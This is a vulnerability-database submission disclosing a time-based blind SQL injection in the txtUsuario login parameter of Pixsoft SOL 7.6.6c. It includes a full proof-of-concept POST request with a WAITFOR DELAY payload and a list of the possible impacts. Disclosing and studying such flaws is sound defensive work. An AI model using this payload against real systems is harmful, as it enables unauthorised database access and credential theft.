Submit #503275: Pix Software Sol < 7.6.6 Time Based Blind SQL Injectioninfo

TitlePix Software Sol < 7.6.6 Time Based Blind SQL Injection
DescriptionTime-Based Blind SQL Injection in SOL 7.6.6c Vendor: Pixsoft Product: SOL Version Affected: 7.6.6c Vulnerability Type: Time-Based Blind SQL Injection Description: A Time-Based Blind SQL Injection vulnerability has been discovered in SOL 7.6.6c, a software solution developed by Pixsoft. The issue resides in the login endpoint: /pix_projetos/servlet?act=login&submit=1&evento=0&pixrnd=0125021816444195731041 The parameter txtUsuario is vulnerable to SQL Injection, allowing an attacker to manipulate database queries. By injecting a time delay, it was confirmed that the database is processing unauthorized SQL commands. Proof of Concept (PoC): POST /pix_projetos/servlet?act=login&submit=1&evento=0&pixrnd=0125021816444195731041 HTTP/1.1 Host: X.X.X.X Content-Length: 105 Cache-Control: max-age=0 Accept-Language: pt-BR,pt;q=0.9 Origin: http://pixmail.pixsoft.com.br Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: X.X.X.X Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=76FB85D5E35213B0BD7A7A86BD4D76BD; _gcl_au=1.1.334603891.1739905600; _gid=GA1.3.860382090.1739905601; _clck=9f8nok%7C2%7Cftj%7C0%7C1875; _clsk=1wtvknu%7C1739905603096%7C1%7C1%7Cl.clarity.ms%2Fcollect; _ga=GA1.1.843985755.1739905601; __hstc=33596862.803e30ca9e175e861a7f7068c3cbeb5b.1739905604733.1739905604733.1739905604733.1; hubspotutk=803e30ca9e175e861a7f7068c3cbeb5b; __hssrc=1; _ga_XSPF198YDZ=GS1.1.1739905603.1.0.1739905611.52.0.0 Connection: keep-alive flagMudouIdioma=N&loginSolicita=0&idioma=br%3B0&txtUsuario='+WAITFOR+DELAY+'0:0:5'--&txtSenha=test&token= -- the server’s response time increases by approximately 5 seconds, indicating that the injected SQL command was executed successfully. This confirms that the application is vulnerable to time-based blind SQL injection. Impact: An attacker exploiting this vulnerability can: Extract sensitive database information, such as user credentials. Bypass authentication mechanisms. Modify or delete data within the database. Chain the attack with other vulnerabilities for further exploitation. Since this is a blind SQL Injection, attackers can iteratively extract data by analyzing response times. By: Yago Martins
Source⚠️ https://github.com/yago3008/cves
User
 y4g0 (UID 80480)
Submission02/18/2025 08:51 PM (12 months ago)
Moderation03/01/2025 08:50 AM (10 days later)
StatusAccepted
VulDB entry298067 [Pixsoft Sol up to 7.6.6c Login Endpoint txtUsuario sql injection]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!